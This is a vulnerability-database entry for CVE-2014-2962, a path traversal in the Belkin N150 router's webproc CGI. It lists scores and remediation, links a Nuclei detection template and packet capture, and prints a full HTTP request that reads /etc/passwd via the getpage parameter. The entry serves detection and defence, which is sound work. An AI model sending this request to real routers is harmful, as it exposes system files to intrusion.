🔙 목록으로 돌아가기

CVE-2014-2962: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal

TitleBelkin N150 Router 1.00.08/1.00.09 - Path Traversal
Authordaffainfo
SeverityHigh
ImpactAn attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.
RemediationEnsure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
CVSS Score7.8
EPSS Score0.87901
CVE IDCVE-2014-2962
CWE IDCWE-22
Tags cve2014 cve lfi router firmware traversal belkin vuln

🔍 Vulnerability Description

A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.

🌐 HTTP Request

GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.14
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-2962.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-2962.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A